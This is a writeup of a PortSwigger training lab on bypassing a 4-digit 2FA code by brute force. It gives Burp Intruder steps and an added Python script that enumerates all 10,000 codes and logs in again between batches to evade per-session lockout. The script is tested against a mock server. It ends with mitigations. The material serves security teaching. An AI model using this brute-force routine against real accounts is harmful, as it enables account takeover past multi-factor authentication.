
🗂️PortSwigger Lab Writeup: 2FA Bypass using a Brute-Force Attack

[Image: PortSwigger lab banner, 2FA bypass using a brute-force attack]


🎯 Objective

The objective of this lab is to exploit a multi-factor authentication weakness where the second factor (a short numeric 2FA code) can be brute-forced. We already have carlos's username and password; the goal is to brute-force his 2FA code and log in to his account.

  • Lab URL: https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-bypass-using-a-brute-force-attack
  • Category: Authentication
  • Difficulty: Expert

🧪 Exploitation Steps

🕵️Step 1: Observe the Website

  • First, open the lab URL in your browser and observe what the site does and how it works.
    [Screenshot: lab homepage showing the site layout]
    [Screenshot: login page of the vulnerable application]
  • At first glance, the site is a blog with a login page. The lab description already gives us carlos's password; what we have to brute-force is the 2FA code, so that we can log in to his account.

📝Step 2: Try MFA

  • Now let's observe how the multi-factor authentication works by logging in as carlos:montoya.
    [Screenshot: login attempt for carlos captured in Burp]
  • We are redirected to the /login2 page, which asks for the OTP sent to the user's email.
  • Since we don't have access to the email client, enter a few wrong OTPs and watch how the application reacts to repeated failures.
    [Screenshot: /login2 page showing OTP entry and the behaviour after failed attempts]
  • After 3 failed attempts we are sent back to the /login page and have to enter the credentials again.
  • So every 3 attempts the whole authentication process must be repeated. This is the only protection the OTP check has: guesses are limited per session, but the counter starts again with every fresh login, and nothing locks the account.

🚀Step 3: Brute-Force MFA code

  • Send the GET /login2 request from HTTP history to Repeater with Ctrl + R.
    [Screenshot: Repeater with the GET /login2 request from HTTP history]
  • Make sure the cookie reads verify=carlos (if it still says verify=wiener from an earlier session, change it) and send the request so that a 2FA code is generated for carlos.
    [Screenshot: Repeater request with the cookie changed from verify=wiener to verify=carlos]
  • Send the POST /login2 request from HTTP history to Intruder with Ctrl + I.
    [Screenshot: Intruder with the POST /login2 request ready for brute-force]
  • Here too, change the cookie verify=wiener to verify=carlos so that the guesses are checked against carlos's code.
  • Add a payload marker on the mfa-code value and set the attack type to Sniper.
    [Screenshot: Intruder payload marker on the mfa-code field, Sniper attack]
  • In the Payloads section, set the payload type to Brute forcer.
  • Set the character set to 0123456789 and both Min length and Max length to 4, because the MFA code is 4 digits (10,000 possible values).
    [Screenshot: Intruder brute-forcer settings, digits 0-9, length 4]
  • Remember the check from Step 2: after 3 failed attempts the session is sent back to /login, so guesses made from a dead session are never evaluated. The login has to be repeated before each batch of guesses. Burp's session handling rules (a macro that performs the login, run before every Intruder request) are the usual way to do this; whichever way you choose, confirm that later responses are still 200 responses from /login2 and not redirects back to /login.
  • After configuring everything, start the attack.
    [Screenshot: Intruder results showing a 302 Found on the successful OTP guess]
  • Sort the results by status code: one payload gets a unique 302 Found response while every other guess gets a 200. That payload is carlos's valid MFA code.
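
The procedure above, reduced to its logic as an added example rather than code from the writeup or PortSwigger's own solution: enumerate the 4-digit space, re-authenticate every few guesses so that each code is evaluated by a live session, and treat the one redirect that is not "back to /login" as the hit. The paths /login and /login2, the fields username, password and mfa-code, and the verify cookie are taken from the writeup; the FakeLab class, its 3-attempt limit and all status/redirect details are constructed assumptions so the script runs offline. The `send` callable is the seam where a real HTTP client goes (one that does not follow redirects and returns the status, the Location header and the cookies after the response).

```python
"""Brute-force a 4-digit 2FA code with automatic re-login.

Added example, not PortSwigger's solution and not code from the writeup.
FakeLab and every status/redirect detail are constructed assumptions.
"""
from itertools import product


class FakeLab:
    """Constructed stand-in for the target: a session may submit
    `attempt_limit` wrong codes, then it is dropped and the client is
    redirected to /login (mirrors the behaviour observed in Step 2)."""

    def __init__(self, username, password, secret_code, attempt_limit=3):
        self.username, self.password, self.secret_code = username, password, secret_code
        self.attempt_limit = attempt_limit
        self.sessions = {}            # session id -> number of failed codes
        self.requests = self._seq = 0

    def send(self, path, form, cookies):
        """Return (status, Location header or None, cookies after the response)."""
        self.requests += 1
        if path == "/login":
            if (form.get("username"), form.get("password")) != (self.username, self.password):
                return 200, None, cookies
            self._seq += 1
            sid = f"s{self._seq}"
            self.sessions[sid] = 0
            return 302, "/login2", {"session": sid, "verify": self.username}
        if path == "/login2":
            sid = cookies.get("session")
            if sid not in self.sessions or cookies.get("verify") != self.username:
                return 302, "/login", {}
            if form.get("mfa-code") == self.secret_code:
                return 302, f"/myaccount?id={self.username}", cookies
            self.sessions[sid] += 1
            if self.sessions[sid] >= self.attempt_limit:
                del self.sessions[sid]          # too many failures: back to /login
                return 302, "/login", {}
            return 200, None, cookies
        raise ValueError(f"unexpected path {path}")


def login(send, username, password):
    """Primary authentication; returns the cookies of the fresh OTP session."""
    status, location, cookies = send("/login", {"username": username, "password": password}, {})
    if status != 302 or location != "/login2":
        raise RuntimeError("primary credentials rejected")
    return cookies


def brute_force_mfa(send, username, password, code_len=4, attempt_limit=3):
    """Try every digit code in order. Log in again every `attempt_limit`
    guesses, and also whenever the target drops the session earlier than
    expected. Returns (code_or_None, guesses_sent, logins_performed)."""
    guesses = logins = 0
    cookies, used = {}, attempt_limit            # forces a login before guess 1
    for digits in product("0123456789", repeat=code_len):
        code = "".join(digits)
        while True:
            if used >= attempt_limit:
                cookies = login(send, username, password)
                logins, used = logins + 1, 0
            status, location, after = send("/login2", {"mfa-code": code}, cookies)
            guesses += 1
            used += 1
            kicked = status == 302 and location == "/login"
            if kicked and used < attempt_limit:
                # Dropped sooner than assumed: shrink the per-session budget,
                # re-login and resend this guess so no code is silently skipped.
                attempt_limit = max(1, used - 1)
                used = attempt_limit
                continue
            if status == 302 and not kicked:     # the one 302 that is not "back to /login"
                return code, guesses, logins
            cookies = after
            break
    return None, guesses, logins


if __name__ == "__main__":
    lab = FakeLab("carlos", "montoya", "0397")   # constructed secret for the demo
    print(brute_force_mfa(lab.send, "carlos", "montoya"))
```

The re-login counter is what the Burp session handling rule does for Intruder; the early-kick branch matters because the real per-session limit may be lower than you measured, and a guess sent from a dropped session is simply not evaluated, so blindly continuing would leave holes in the code space.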

🧑‍💼Step 4: Log in as carlos

  • Locate the request that returned 302 Found in the Intruder results; it is the POST /login2 carrying carlos's correct mfa-code. If that session has since expired, log in again with carlos:montoya on the login page and submit the recovered code once more.
    [Screenshot: login form filled with carlos's credentials]
  • Right-click on the successful request and select Show response in browser. Copy the URL and load it in the browser (with Burp as proxy).
  • The redirect takes us from /login2 to /myaccount?id=carlos: we are logged in as carlos without ever seeing the OTP that was emailed to him.
    [Screenshot: account page at /myaccount?id=carlos in the browser]
  • The lab is solved.

🧠 Conclusion

  • This lab involves a weak 2FA implementation: the OTP verification step has no brute-force protection worth the name. Failed guesses are only counted per session (3, then back to /login), the counter resets on every fresh login, and nothing locks the account or throttles the attacker.
  • A 4-digit code has just 10,000 possible values, so an attacker who re-authenticates between batches of guesses can iterate the whole space with Intruder and find the valid one; the cost of the extra logins is negligible.
  • By brute-forcing the OTP for carlos and picking out the single 302 Found response, we bypassed MFA and accessed his account. A robust implementation would count failures per account or per issued code rather than per session, invalidate the code after a handful of wrong attempts, and rate-limit the endpoint.